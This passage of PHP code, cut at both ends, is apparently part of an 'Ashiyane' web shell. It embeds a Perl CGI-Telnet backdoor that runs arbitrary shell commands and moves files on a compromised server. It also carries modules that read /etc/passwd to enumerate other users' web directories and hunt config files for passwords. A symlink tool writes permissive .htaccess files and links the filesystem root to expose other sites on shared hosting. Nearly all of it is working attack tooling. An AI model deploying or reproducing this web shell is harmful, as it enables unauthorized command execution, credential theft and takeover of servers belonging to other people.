$i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<br><br>'; echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font></b>"; echo "<b><font color=\"#FFFFFF\">[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font></b>"; echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>"; foreach ($users as $user) { $p4th = "/home/$user/public_html/"; echo "<form method=get><span><font color=#2677B4>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input type='hidden' name='action' value='explorer'><input class='foottable' type=text name=dir value='$p4th'><input type=submit value='>>'></form><br>"; } echo '<br><br></b>'; echo '</div>'; } if($action=="cgiashiyane"){ mkdir('cgiashiyane',0755); chdir('cgiashiyane'); $ashiyane1 = '.htaccess'; $ashiyane2 = "$ashiyane1"; $ashiyane3 = fopen ($ashiyane2 ,'w') or die ('ERROR!!!'); $ashiyane4 = 'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .ashiyane AddHandler cgi-script .ashiyane AddHandler cgi-script .ashiyane'; fwrite ( $ashiyane3 ,$ashiyane4 ) ; fclose ($ashiyane3); $ashiyane5 = " #!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: mailto:UNITX_TEAM@HOTMAIL.COM
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
#    your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
#    Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
#    the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
		# Change this. You will need to enter this
				# to login.

$WinNT = 0;			# You need to change the value of this to 1 if
				# you're running this script on a Windows NT
				# machine. If you're running it on Unix, you
				# can leave the value as it is.

$NTCmdSep = "&";		# This character is used to seperate 2 commands
				# in a command line on Windows NT.

$UnixCmdSep = ";";		# This character is used to seperate 2 commands
				# in a command line on Unix.

$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
				# Don't set this to a very large value. This is
				# useful for commands that may hang or that
				# take very long to execute, like "find /".
				# This is valid only on Unix servers. It is
				# ignored on NT Servers.

$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
				# browser as soon as it is output, otherwise
				# it is buffered and send when the command
				# completes. This is useful for commands like
				# ping, so that you can see the output as it
				# is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse 
{
	local (*in) = @_ if @_;
	local ($i, $loc, $key, $val);
	
	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

	if($ENV{'REQUEST_METHOD'} eq "GET")
	{
		$in = $ENV{'QUERY_STRING'};
	}
	elsif($ENV{'REQUEST_METHOD'} eq "POST")
	{
		binmode(STDIN) if $MultipartFormData & $WinNT;
		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
	}

	# handle file upload data
	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
	{
		$Boundary = '--'.$1; # please refer to RFC1867 
		@list = split(/$Boundary/, $in); 
		$HeaderBody = $list[1];
		$HeaderBody =~ /\r\n\r\n|\n\n/;
		$Header = $`;
		$Body = $';
 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
		$in{'filedata'} = $Body;
		$Header =~ /filename=\"(.+)\"/; 
		$in{'f'} = $1; 
		$in{'f'} =~ s/\"//g;
		$in{'f'} =~ s/\s//g;

		# parse trailer
		for($i=2; $list[$i]; $i++)
		{ 
			$list[$i] =~ s/^.+name=$//;
			$list[$i] =~ /\"(\w+)\"/;
			$key = $1;
			$val = $';
			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} = $val; 
		}
	}
	else # standard post data (url encoded, not multipart)
	{
		@in = split(/&/, $in);
		foreach $i (0 .. $#in)
		{
			$in[$i] =~ s/\+/ /g;
			($key, $val) = split(/=/, $in[$i], 2);
			$key =~ s/%(..)/pack("c", hex($1))/ge;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} .= "\0" if (defined($in{$key}));
			$in{$key} .= $val;
		}
	}
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
	$EncodedCurrentDir = $CurrentDir;
	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
	print "Content-type: text/html\n\n";
	print <<END;
<html>
<head>
<title>Ashiyane</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#009900"><b>CGI-Telnet Ashiyane Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="UNITX_TEAM@HOTMAIL.COM">Help</a>
</font></td>
</tr>
</table>
<font color="#009900" size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
	$Message = q$<pre><font color="#ff0000"> _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
                                         
</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2003, Ashiyane</font><font color="#FF0000">
                   .-&quot;      &quot;-.
                  /   UNIT-X   \
                 |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \</font><font color="#009900">_______</font><font color="#FF0000">\</font><font color="#009900">__</font><font color="#FF0000">|*EVIL*|</font><font color="#009900">__</font><font color="#FF0000">/</font><font color="#009900">_______________________
</font><font color="#FF0000"> (_)</font><font color="#009900">@8@8</font><font color="#FF0000">{}</font><font color="#009900">&lt;________</font><font color="#FF0000">|-\MASTER/-|</font><font color="#009900">________________________&gt;</font><font color="#FF0000">
        )_/        \          / 
       (@           `--------`
             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
	print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
	print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
	print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
	foreach $cookie(@httpcookies)
	{
		($id, $val) = split(/=/, $cookie);
		$Cookies{$id} = $val;
	}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
	print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
	&PrintPageHeader("p");
	&PrintLogoutScreen;
	&PrintLoginScreen;
	&PrintLoginForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin 
{
	if($LoginPassword eq $Password) # password matched
	{
		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
		&PrintPageHeader("c");
		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # password didn't match
	{
		&PrintPageHeader("p");
		&PrintLoginScreen;
		if($LoginPassword ne "") # some password was entered
		{
			&PrintLoginFailedMessage;
		}
		&PrintLoginForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
	if(!$WinNT)
	{
		alarm(0);
		print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
		&PrintCommandLineInputForm;
		&PrintPageFooter;
		exit;
	}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
	{
		# we change the directory internally. The output of the
		# command is not displayed.
		
		$OldDir = $CurrentDir;
		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
		chop($CurrentDir = `$Command`);
		&PrintPageHeader("c");
		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
		print "<code>$Prompt $RunCommand</code>";
	}
	else # some other command, display the output
	{
		&PrintPageHeader("c");
		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
		print "<code>$Prompt $RunCommand</code><xmp>";
		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
		if(!$WinNT)
		{
			$SIG{'ALRM'} = \&CommandTimeout;
			alarm($CommandTimeoutDuration);
		}
		if($ShowDynamicOutput) # show output as it is generated
		{
			$|=1;
			$Command .= " |";
			open(CommandOutput, $Command);
			while(<CommandOutput>)
			{
				$_ =~ s/(\n|\r\n)$//;
				print "$_\n";
			}
			$|=0;
		}
		else # show output after command completes
		{
			print `$Command`;
		}
		if(!$WinNT)
		{
			alarm(0);
		}
		print "</xmp>";
	}
	&PrintCommandLineInputForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
	local($FileUrl) = @_;
	if(-e $FileUrl) # if the file exists
	{
		# encode the file link so we can send it to the browser
		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
		&PrintPageHeader("c");
		print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # file doesn't exist
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $FileUrl: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
	local($SendFile) = @_;
	if(open(SENDFILE, $SendFile)) # file opened for reading
	{
		if($WinNT)
		{
			binmode(SENDFILE);
			binmode(STDOUT);
		}
		$FileSize = (stat($SendFile))[7];
		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
		print "Content-Type: application/x-unknown\n";
		print "Content-Length: $FileSize\n";
		print "Content-Disposition: attachment; filename=$1\n\n";
		print while(<SENDFILE>);
		close(SENDFILE);
	}
	else # failed to open file
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $SendFile: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
	# if no file is specified, print the upload form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileUploadForm;
		&PrintPageFooter;
		return;
	}
	&PrintPageHeader("c");

	# start the uploading process
	print "<code>Uploading $TransferFile to $CurrentDir...<br>";

	# get the fullly qualified pathname of the file to be created
	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
	$TransferFile =~ m!([^/^\\]*)$!;
	$TargetName .= $PathSep.$1;

	$TargetFileSize = length($in{'filedata'});
	# if the file exists and we are not supposed to overwrite it
	if(-e $TargetName && $Options ne "overwrite")
	{
		print "Failed: Destination file already exists.<br>";
	}
	else # file is not present
	{
		if(open(UPLOADFILE, ">$TargetName"))
		{
			binmode(UPLOADFILE) if $WinNT;
			print UPLOADFILE $in{'filedata'};
			close(UPLOADFILE);
			print "Transfered $TargetFileSize Bytes.<br>";
			print "File Path: $TargetName<br>";
		}
		else
		{
			print "Failed: $!<br>";
		}
	}
	print "</code>";
	&PrintCommandLineInputForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
	# if no file is specified, print the download form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileDownloadForm;
		&PrintPageFooter;
		return;
	}
	
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
	&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
	&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
	&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
	&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
	&PerformLogout;
}


 "; $ashiyane6 = fopen('cgi.ashiyane','w+'); $ashiyane7 = fwrite ($ashiyane6 ,base64_decode($ashiyane5)); fclose($ashiyane6); chmod('cgi.ashiyane',0755); echo '<a name="down"></a><iframe src=cgiashiyane/cgi.ashiyane width=100% height=600px frameborder=0></iframe> '; } if($action=="sym"){ ?> <div style="font-size:20px"> <b> <a href="?action=sym&sym=dsym">| Domains |</a> <a href="?action=sym&sym=dusym">| Domains User Symlink |</a> <a href="?action=sym&sym=passwd">| Passwd Symlink |</a> <a href="?action=sym&sym=fsym">| File Symlinker |</a> <a href="?action=sym&sym=dasym">| Direct Admin Symlink |</a> </b> <br /><br /> </div> <?php if(isset($_GET['sym']) && $_GET['sym']=="dusym"){ if(!@file_exists("/etc/virtual/domainowners")){ @set_time_limit(0); echo "<center>"; @mkdir('sym',0777); $ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $htfile =@fopen ('sym/.htaccess','w'); fwrite($htfile ,$ht); @symlink('/','sym/root'); $basename = basename('_FILE_'); $namedfile = @file('/etc/named.conf'); if(!$namedfile) { echo "<b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></center>"; } else { echo "<br> <style> .syms td{ border:1px solid #2677B4; } .syms tr:hover{ background: #646464; } </style> "; echo "<table align='center' width='40%' class='syms'> <td><font color=\"#2677B4\"><b><center># Count</center></font></b></td> <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td> <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td> <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>"; $count=1; foreach($namedfile as $namedfiles){ if(@eregi('zone',$namedfiles)){ preg_match_all('#zone "(.*)"#',$namedfiles,$namedfiles2); flush(); if(strlen(trim($namedfiles2[1][0])) >2){ $valiasesfile = posix_getpwuid(@fileowner('/etc/valiases/'.$namedfiles2[1][0])); $valiasfilename = $valiasesfile['name']; @symlink('/','sym/root'); $valiasfilename = $namedfiles2[1][0]; $irdom = '\.ir'; $ildom = '\.il'; if (@eregi("$irdom",$namedfiles2[1][0]) or @eregi("$ildom",$namedfiles2[1][0]) ){ $valiasfilename = "<b><font style=\"color:#00A220\">".$namedfiles2[1][0].'</font></b>';} echo "<tr><td><font color=\"#2677B4\">{$count}</font></td><td><a target='_blank' href=http://www.".$namedfiles2[1][0].'/><font color=#f00><b>'.$valiasfilename.'</b> </a></font></td><td><font color="white"><b>'.$valiasesfile['name']."</font></b></td><td><a href='sym/root/home/".$valiasesfile['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush(); $count++;}}}} } else { echo '<br><font color="#FFFFFF">This is Server DirectAdmin</font><font color="#FF0000">Symlink for Direct Admin</font></b> '; } echo "</center></table>"; } if(isset($_GET['sym']) && $_GET['sym']=="dasym"){ if(@file_exists("/etc/virtual/domainowners")){ @mkdir('sym',0777); $ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $htfile =@fopen ('sym/.htaccess','w'); fwrite($htfile ,$ht); @symlink('/','sym/root'); fclose($htfile); $sole = @file("/etc/virtual/domainowners"); $count=1; echo "<style> .syms td{ border:1px solid #2677B4; } .syms tr:hover{ background: #646464; } </style><br>"; echo "<table align='center' width='40%' class='syms'> <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td> <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td> <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td> <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>"; foreach($sole as $visible){ if(@eregi(":",$visible)){ $exfile = explode(':', $visible); echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($exfile[0]).'/><font color=\"#00A220\"><b>'.trim($exfile[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($exfile[1])."</font></b></td><td><a href='sym/root/home/".trim($exfile[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush(); $count++;}}echo "</table>";}else{echo '<br><font color="#FFFFFF">This is Server Cpanel Please use</font><font color="#FF0000">Symlink for Cpanel</font></b><br>';} } if(isset($_GET['sym']) && $_GET['sym']=="dsym"){ if(!@file_exists("/etc/virtual/domainowners")){ echo "<center>"; echo "<br> <style> .syms td{ border:1px solid #2677B4; } .syms tr:hover{ background: #646464; } </style> "; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ echo "<b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></center>"; } echo "<br><table align='center' width='40%' class='syms'><td><font color=\"#00A220\"><b><center># Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FF0000\"><b><center>Users</center></font></b></td>"; $count=1; foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "<tr><td><b><font color=\"#00A220\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FF0000\">".$user['name']."</font></b></td></tr>";flush(); $count++; }}} echo "</center></table>"; }else{echo '<br><font color="#FFFFFF">This Server is DirectAdmin Please use </font><font color="#FF0000">Symlink for Direct Admin</font> ';} } if(isset($_GET['sym']) && $_GET['sym']=="passwd"){ @mkdir('sym',0777); $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f =@fopen ('sym/.htaccess','w'); fwrite($f , $htcs); @symlink("/","sym/root"); $pg = basename(__FILE__); if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){ $cont = stripcslashes($_POST['file']); if(!file_exists('passwd.txt')){ $f = @fopen('passwd.txt','w'); $w = @fwrite($f,$cont); fclose($f); } if($w or @filesize('passwd.txt') > 0){ // * SHOW * // echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f){ $u=explode(':', $f); $user = $u['0']; echo " <tr> <td width='15%'> $user </td> <td width='10%'> <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a> </td> <td width='10%'> <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a> </td> </tr></div> "; flush(); flush(); } die ("</tr></div>"); } } echo "read /etc/passwd"; echo "<br /><br /><form method='post' action='?action=sym&sym=passwd&save=1'><textarea cols='80' rows='20' name='file'>"; flush(); $file = '/etc/passwd'; $r3ad = @fopen($file, 'r'); if ($r3ad){ $content = @fread($r3ad, @filesize($file)); echo "".htmlentities($content).""; } elseif(!$r3ad) { $r3ad = @show_source($file) ; } elseif(!$r3ad) { $r3ad = @highlight_file($file); } elseif(!$r3ad) { for($uid=0;$uid<1000;$uid++){ $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } } flush(); echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>"; flush(); } if(isset($_GET['sym']) && $_GET['sym']=="fsym"){ echo'The file path to symlink : <br /><br /> <form method="post" action="?action=sym&sym=fsym"> <input type="text" name="file" value="/home/user/public_html/file_name" size="60"/><br /><br /> <input type="text" name="symfile" value="file_name ( Ex. :: file.txt )" size="60"/><br /><br /> <input type="submit" value="symlink" name="symlink" /> <br /><br /> </form> '; if(isset($_POST['file']) && isset($_POST['symfile']) & isset($_POST['symlink'])){ $path_file = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @mkdir('symlink',0777); $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n"; $f =@fopen ('symlink/.htaccess','w'); @fwrite($f , $c); @symlink("$path_file","symlink/$symfile"); echo '<br /><a target="_blank" href="symlink/'.$symfile.'" >'.$symfile.'</a>'; } } } } if($action=="zipper"){ if (class_exists('ZipArchive')){ echo ' <center> <br /><br /> <form actoin="?action=zipper&dir='.$path.'#down" method="post"> <a name="down"></a> <font color="#FFFFFF"><b>Dir:</b> </font> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br /> <font color="#FFFFFF"><b>Save Dir: </b></font><input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br /> <input type="submit" value=">>" name="ziper" /> <br /><br /> </form></center> '; $code = 